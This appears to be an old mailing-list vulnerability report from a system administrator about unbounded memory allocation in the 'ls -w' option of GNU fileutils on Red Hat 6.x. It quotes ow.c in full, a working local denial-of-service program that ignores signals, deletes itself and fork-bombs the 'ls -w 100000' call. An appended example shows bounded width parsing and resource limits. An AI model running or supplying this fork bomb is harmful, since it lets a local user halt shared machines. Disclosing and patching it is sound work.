Morning,
I recently discovered that a local user could compile a short program
(ow.c) that would when run successfully grind a GNU fileutils system to a
complete halt. I have tried this program on Redhat 6.1 & 6.2 and both
come down the same way.
It apparently takes advantage of the way ls -w doesn't check for bounds
and will allocate memory until it is exhausted.
I am running Redhat 6.1 (Kernel 2.2.16-3smp), with version 4.0p of (ls -
fileutils). I also attach the offending code I tracked down from
rootshell.com.
--
System Admin - h66md.dyndns.org
Redhat Linux 6.1 [2.2.16-3smp]
/*
[ow.c by DjLizard]
This one's heinous. ow exploits a hole I found in ls awhile back.
'-w' is the ls parameter for screen width. It has no bounds checking, and will
gladly allocate enough memory to display a listing on, say, a 100,000 column
terminal. This, coupled with the old fork bomb technique and signal ignoring,
make this one hell of a DoS attack.
Don't try this anywhere *but* home. I am not responsible for *you*.
[SXN]
*/
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
main(int a,char **b)
{
for (int c=1; c < 31; c++) signal (c, 1);
unlink(b[0]);
for(;;){fork();system("/bin/ls -w 100000 /dev");}
}
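
The missing check described above, as an added example that is not part of the original post and is not code from fileutils: a width option parsed with an upper bound, plus per-process resource limits as a second line of defence against the memory exhaustion and fork loop. MAX_LINE_WIDTH, parse_line_width and limit_resources are assumed names chosen for illustration.

```c
/* Added example: bounded parsing of a width option plus per-process limits.
   MAX_LINE_WIDTH and both function names are assumptions for illustration. */
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/resource.h>

#define MAX_LINE_WIDTH 4096UL   /* assumed cap, well above real terminals */

/* Parse a decimal width. Returns 0 and stores the value on success, -1 on
   empty input, sign characters, trailing junk, overflow, zero, or > cap. */
int parse_line_width(const char *arg, unsigned long *out)
{
    char *end;
    unsigned long v;

    if (arg == NULL || !isdigit((unsigned char)arg[0]))
        return -1;              /* also rejects "-1", which strtoul would wrap */
    errno = 0;
    v = strtoul(arg, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return -1;
    if (v == 0 || v > MAX_LINE_WIDTH)
        return -1;
    *out = v;
    return 0;
}

/* Defence in depth for the caller: cap address space and process count so
   neither a huge allocation nor a fork loop can exhaust the machine. */
int limit_resources(rlim_t max_bytes, rlim_t max_procs)
{
    struct rlimit as = { max_bytes, max_bytes };
    struct rlimit np = { max_procs, max_procs };

    if (setrlimit(RLIMIT_AS, &as) != 0)
        return -1;
    return setrlimit(RLIMIT_NPROC, &np);
}

int main(int argc, char **argv)
{
    unsigned long w;

    if (argc != 2 || parse_line_width(argv[1], &w) != 0) {
        fprintf(stderr, "invalid line width\n");
        return 1;
    }
    printf("width %lu accepted\n", w);
    return 0;
}
```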